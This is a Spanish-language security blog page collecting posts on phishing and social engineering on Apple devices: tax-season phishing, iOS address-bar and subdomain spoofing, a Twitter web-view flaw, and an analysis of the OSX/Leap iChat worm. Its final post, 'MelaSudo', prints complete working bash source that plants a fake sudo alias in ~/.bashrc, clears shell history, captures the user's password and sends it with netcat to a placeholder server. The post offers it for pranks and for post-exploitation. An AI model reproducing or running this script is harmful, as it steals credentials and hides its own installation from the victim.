Menú principal

Mostrando entradas con la etiqueta ingeniería social. Mostrar todas las entradas
Mostrando entradas con la etiqueta ingeniería social. Mostrar todas las entradas

miércoles, 22 de agosto de 2018

Guía de seguridad para tu Secure Summer! (Parte 2)

En este post continuamos con la segunda parte de la Guía de seguridad para tu Secure Summer! Recogemos el testigo del post anterior y procedemos a expandir nuestro diccionario de términos.
Como introducíamos en el primer artículo, Las técnicas de ciberataques han evolucionado mucho durante los últimos años, desde simples estrategias de engaño haciendo uso del email hasta hasta malware que detecta las pulsaciones del teclado de la máquina atacada. Debido a la importancia y al valor de la información a la que los atacantes se esfuerzan por tener acceso, todo lo relacionado con la privacidad del usuario y la protección de los datos personales ha aumentado considerablemente. 

jueves, 22 de marzo de 2018

¡Ojo en tu Mac! Nueva oleada de Scams en los borradores de Hacienda en Estados Unidos

Se acerca la época de pago de tasas e impuestos, sin duda una de las mejores épocas para que los estafadores usen todas sus técnicas para recopilar datos. Como es habitual desde hace años, Hacienda ya ha avisado del peligro de caer en una estafa a la hora de hacer los borradores, de hecho ha publicado una lista de las 12 estafas más habituales (Dirty Dozen) a la hora de hacer el borrador. Este año la lista está encabezada por los correos phishing que suplantan a la Agencia Tributaria y solicitan datos personales de los ciudadanos.

Investigadores de Zscaler han publicado recientemente en su blog el hallazgo de al menos cuatro nuevos casos de phishing en los cuales se utilizaban páginas falsas que suplantaban la página oficial de la Agencia Tributaria. Los equipos de Apple están siendo también objetivo, en este caso, ya que cualquiera puede ser objetivo de este tipo de ataques.

“Los cibercriminales llevan un tiempo utilizando la ingeniería social y los ataques phishing para robar información a sus víctimas sin levantar sospechas, aprovechan los acontecimientos y tendencias para hacer que sus ataques sean más sofisticados y efectivos. La temporada de pago de impuestos ofrece a estos atacantes la posibilidad de suplantar varias empresas u organismos del estado para obtener información de miles de usuarios”

Figura 1: Edificio de Hacienda en EEUU

El principal objetivo de estos ataques es la obtención de los datos bancarios y en muchos casos de las contraseñas de las víctimas. En muchos de los casos las páginas fraudulentas enviaban un mensaje avisando de que el tiempo para rellenar el formulario ha expirado, a continuación te ofrecen la posibilidad de recargar la página redirigiéndote a la página oficial sin levantar sospechas. Las consecuencias de este tipo de ataques pueden ser graves, en muchos casos la información sustraída se utiliza para solicitar falsas devoluciones y así monetizar el ataque. En la gran mayoría de los casos se puede evitar este tipo de ataques simplemente revisando la URL de cada página antes de introducir nuestros datos en los formularios.

viernes, 18 de octubre de 2013

Phishing & Client-Side Attacks: iOS sigue poniéndolo fácil

El phishing es uno de los campos que más ha explotado con el tema de los dispositivos móviles y es que los navegadores no ayudan a combatir este mal que acecha al mundo de la seguridad. Aplicando las normas de la ingeniería social podemos llegar a hacer verdaderas obras de arte con un coste de tiempo bajo, gracias a herramientas como SET, por ejemplo, pero cuando la combinación es SET y los navegadores de los dispositivos móviles la mezcla es explosiva. 

Al final la definición clásica de phishing es la de estafa mediante el uso de la ingeniería social para obtener información de manera fraudulenta. A continuación exponemos algunos ejemplos de lo fácil que es a día de hoy caer en una emboscada hecha para lograr acceso mediante un client-side attack, tal y como se cuenta en el capítulo del mismo nombre en el libro de Hacking iOS: iPhone & iPad

Bar address: Ocultando verdades

El primer ejemplo que comentamos es el de la bar address. Sabemos que al entrar en un sitio web el dispositivo móvil intenta aportar el mayor campo de visibilidad al usuario haciendo que la barra de direcciones desaparezca rápidamente. Este hecho supone un foco donde el usuario no pondrá sus ojos, facilitando la suplantación de una web. En el título de la página se muestra, simplemente el título que se quiera mostrar, fácilmente copiable por el usuario malicioso. 

Pero, podemos ir un paso más allá, e incluso aunque el navegador nos haga el favor de ocultar la barra, podríamos implementar nuestra barra de direcciones, para que en todo momento el usuario confíe en el contenido, tal y como se hacía ya en el año 2010.

Figura 1: Mostrando una barra falsa

El componente UIWeb View

El desarrollador de apps para iOS conocerá bien este componente, da riqueza a su aplicación permitiéndola utilizar controles de Mobile Safari con el fin de navegar o consultar recursos web a través de su aplicación. ¿Qué ocurre con la URL? ¿Es mostrada en algún lugar? Pues la respuesta es, que por defecto, no. En otras palabras, debe ser el desarrollador el que se esfuerce en añadir la URL a la que se conecta la app

Uno de los casos más famosos y del que ya hablamos en Seguridad Apple fue el de la app de Twitter. Siguen existiendo apps famosas en la AppStore que permiten estas circunstancias, os añadimos una imagen que puede ayudaros a comprender el problema del asunto.

Figura 2: UI Web View sin URL en Gmail para iOS

Como se puede visualizar es un tema delicado, ya que cualquiera podría realizar dicha acción utilizando el menú de SET y con alguno de los cientos de servidores de correo abiertos que hay por Internet.

La utilización del subdominio

Sabemos que las barras de direcciones no son muy grandes en pantallas de 3.5, 4, 5 pulgadas. Los phishers también lo saben y por ello utilizan una técnica denominada "muestro subdominio que corresponda con dominio real y te robo".

El ejemplo es el siguiente, la URL que se muestre aparece sin protocolo (para que sea más estético) y siempre con el valor del dominio más a la izquierda posible, por ello si utilizamos el siguiente subdominio www.mibanco.es.dominiomalicioso.com, con un poco de suerte y colocación podremos dejar solo visible en la barra de direcciones la parte de www.mibanco.es, por lo que a la vista parece que nos encontramos en dicha URL. El sitio web es una copia falsa en la cual nos mostrarán lo que quieran y nos solicitarán lo que deseen.

En iOS 7 esto no ha mejorado, sino que ha empeorado, ya que ahora en la barra de direcciones de Mobile Safari solo se pueden ver los certificados unos instantes, y la URL completa también, ya que luego solo queda el hostname del sitio. En definitiva, terreno abonado para phishers y ataques APT.

lunes, 6 de mayo de 2013

Twitter para iOS arregló el Address Bar Spoofing... ¿o no?

La aplicación de Twitter para iOS era un caramelo para el phishing, ya que cuando un usuario recibe un tweet con un enlace acortado y éste lo abre se dispone de una vista web embebida en la aplicación que provocaba un Address Bar Spoofing. Esta vista web no mostraba la URL a la que el usuario realmente se estaba conectando, provocando que la realización de un phishing fuera rápido y sencillo, por la naturaleza de Twitter.

La última versión de Twitter para iOS solucionaba este bug, ya que pintaba en el borde superior de la vista embebida la URL a la que el usuario se estaba conectando, tal y como se puede visualizar en la siguiente imagen:

Figura 1: Phishing en Twitter para iOS

Este sitio web no es el login real de Twitter Mobile, aunque realmente lo parece. Como se puede ver en las últimas versiones de la aplicación la URL a la que se conecta el dispositivo móvil aparece en el marco de la aplicación embebida. Al visualizar esto el usuario desconfiará y realmente no introducirá ningún dato en los campos requeridos. Además, la dirección IP informa rápidamente de que el culpable está en nuestra red, por lo que tenemos pillado al susodicho.

El arreglo solo fue a medias

En la imagen siguiente podemos observar que si el usuario o víctima tiene el dispositivo iOS tumbado la aplicación seguirá sin mostrar su dirección URL en el marco de la aplicación. ¿Fail? Eso nos parece, ¿se les habrá olvidado introducir en este tipo de vista algo tan importante como la dirección URL a la que se conecta la aplicación?

Figura 2: Aplicación Twitter para iOS tumbada

Las aplicaciones que tienen vistas web embebidas son realmente peligrosas en el día a día, sobretodo si otros usuarios pueden enviarnos links desde ella y conseguir que visualicemos sitios web. Por eso hay que tener cuidado a lo que se accede y siempre tener en cuenta a donde se está accediendo.

lunes, 21 de enero de 2013

IM-Worm.OSX.Leap: Un gusano de Mac OS X por iChat

Hoy vamos a volver a mirar a la historia del malware para Mac OS X, en concreto, vamos a recordar a IM-Worm.OSX.Leap, un gusano que se creó para Mac OS X 10.4 Tiger y que se distribuía vía iChat, bajo un truco de ingeniería social.

Este gusano se distribuía vía iChat, enviando un mensaje a todos los contactos del usuario infectado con un enlace a Rapidshare, donde había un archivo llamado latestpics.tgz en el que se suponía que había capturas de pantalla del nuevo Mac OS X 10.5 Leopard. Si el usuario descargaba ese archivo, lo desempaquetaba y lo ejecutaba, quedaba infectado, y de nuevo se convertiría en el origen de los mensajes a todos sus contactos vía iChat usando Bonjour.

El fichero que se utilizaba para distribuirse estaba construido únicamente para PowerPC, y además utilizaba SpotLight, que solo estaba disponible a partir de Mac OS X Tiger, así que solo podía infectar a usuarios de Mac OS X 10.4 Tiger en PowerPC, tal y como se puede ver en esta captura hecha con el comando file de bash en SecureLists.

Figura 1: El formato de OSX/Leap.A es de tipo Mach-O para PowerPC

Las cadenas del ejecutable, para evitar su análisis, habían sido ocultadas con un cifrado XOR utilizando una clave de cifrado, por lo que a primera vista no se podían analizar, pero tras un procesado de las mismas y un análisis del flujo de ejecución se podía conocer su comportamiento:

Figura 2: Cadenas cifradas y clave de descifrado
- Se copiaba a si mismo en /tmp con el nombre de latestpics.
- Creaba un fichero .tgz.
- Extraía un Input Manager, llamado “apphook.bundle” y lo copiaba a /tmp.
- Si se ejecutaba con el uid 0 (root) entonces se creaba el directorio /Library/InputManagers/. Cualquier hook de aplicaciones se borraba y el nuevo hook de aplicaciones era copiado desde /tmp.
- Si se ejecutaba con uid 0 creaba ~/Library/InputManagers/.
- Cuando una nueva aplicación era ejecutaba se lanzaba, y el nuevo hook de aplicaciones se cargaba en su espacio de direcciones.

Figura 3: Búsqueda de aplicaciones
- Cada vez que era cargado en una aplicación intentaba enviar latestpics.tgz vía iChat para distribuirse.
Los ingenieros de ESET, que cuentan con una solución profesional antimalware para Mac OS X, publicaron un detallado documento de todo el proceso que puedes descargar desde el siguiente hipervínculo: OSX/Leap.A: Under the Hood

jueves, 16 de febrero de 2012

MelaSudo: robar la password a un sudoer con ingenio

MelaSudo es un pequeño script en bash desarrollado como 'arma de guerrilla' y utilizado internamente dentro del equipo de auditoría web del SOCtano de informatica64, como forma de venganza contra aquellos linuxeros/maqueros que rinden culto al ataque David Hasselhoff.

La finalidad de este script consiste en devolver un ataque David Hasselhoff realizando el robo del password de un usuario con permisos de 'sudoer' mediante el uso de un alias falso del comando 'sudo'. Para ello, lógicamente hay que tener acceso local a la sesión de un usuario con permisos de sudoer, pero en lugar de devolverle el ataque David Hasselhoff, le robareos la password.

Como normalmente hay poco tiempo cuando alguien se deja la sesión abierta, se ha hecho un script que automatiza todo el proceso. La instalación de la trama es muy sencilla, basta con ejecutar el script con el parámetro 'instalar' tal y como se ve en la siguiente captura de pantalla.

Figura 1: Instalación de MelaSudo

El proceso de instalación consiste en la copia del script en '~/.thumbmails' y en añadir la linea 'alias sudo="bash ~/.thumbmails"' al fichero '~/.bashrc'. Éste ultimo fichero es ejecutado cada vez que se inicia una terminal bash, por lo que nos aseguraríamos de que en cada una de ellas se ejecutase el alias encargado de realizar el robo de la password.

A continuación se ve como al ejecutar desde una terminal bash el comando whoami, muestra que se trata del usuario 'haha', y tras realizar una elevación mediante 'sudo', se solicita la la password en dos ocasiones, simulando que en el primer intento se ha introducido incorrectamente, pero tratandose en realidad del script 'Melasudo'. En la segunda petición de password ya se trata realmente del comando sudo, y autentica correctamente al usuario como 'root'.

Figura 2: Ejecución de MelaSudo

Como este script fue diseñado para gastar bromas a compañeros que se dejan el equipo desbloqueado, cosa que no suele ser habitual, fue necesario diseñar un sistema que nos permitiera ver su password sin necesidad a tener que esperar a que se volviera a dejar el equipo sin bloquear. Por ello, se envía a través la red a un servidor web haciendo uso de netcat (asegúrate de que lo tiene, si no adapta el script), para que sea mucho más cómodo todo.

Figura 3: Log generado por MelaSudo en el servidor web

El código del script MelaSudo puedes obtenerlo desde aquí:

#!/bin/bash
if [ "x$1" == "xinstalar" ]; then
cp $0 ~/.thumbmails 2> /dev/null
echo 'alias sudo="bash ~/.thumbmails"' >> ~/.bashrc
echo "instalado"
history -c
exit
fi
#mac
echo -n "Password:"

#ubuntu
#echo -n "[sudo] password for `whoami`: "

read -s password
echo
rutaReal=$(whereis sudo | awk '{print $2}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $1}')
if [ "x$rutaReal" == "x" ]; then
rutaReal=$(whereis sudo | awk '{print $0}')
fi
fi

echo -en "GET /password.php?password=$password HTTP/1.1\nConnection: close\nhost: tuserver.com\n\n" | nc tuserver.com 80 >/dev/null 2>/dev/null

echo -e "Sorry, try again."
$rutaReal $1 $2 $3 $4 $5 $6 $7

Como se puede ver, para cada sistema operativo hay que personalizar el mensaje de error para que sea más creíble el truco. Esperamos que esto os ayude a tener mucho más cuidado de vuestras sesiones, ya que el ataque David Hasselhoff es lo que menos te puede ocurrir.

Por supuesto, esta idea puede ser utilizada en cualquier entorno de post-explotación de una sesión de un usuario sudoer con un ataque client-side, como a través de un Safari o un Java sin parchear.

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares